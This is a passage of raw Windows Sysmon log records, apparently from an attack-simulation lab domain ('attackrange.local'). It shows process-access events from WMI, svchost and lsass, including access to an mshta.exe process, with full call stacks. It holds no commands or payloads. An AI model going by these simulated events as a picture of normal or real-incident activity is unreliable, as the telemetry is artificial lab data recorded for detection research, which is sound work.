indows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030689Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.708{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030688Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.708{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030687Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.708{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030686Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.708{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030685Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.708{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030684Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.708{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030683Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.708{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030682Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.708{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030681Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.708{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030680Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.708{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030679Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.708{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030678Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.708{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030677Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.708{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030676Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.708{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030675Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.614{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-55CB-6008-F306-00000000A301}7828C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030674Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.598{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-55CB-6008-F306-00000000A301}7828C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030673Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.598{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-55CB-6008-F306-00000000A301}7828C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030672Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.348{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-55CB-6008-F306-00000000A301}7828C:\Windows\SysWOW64\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030671Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.348{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-55CB-6008-F306-00000000A301}7828C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030670Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.286{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-55CB-6008-F306-00000000A301}7828C:\Windows\SysWOW64\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030669Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.286{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-55CB-6008-F306-00000000A301}7828C:\Windows\SysWOW64\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030834Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030833Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program 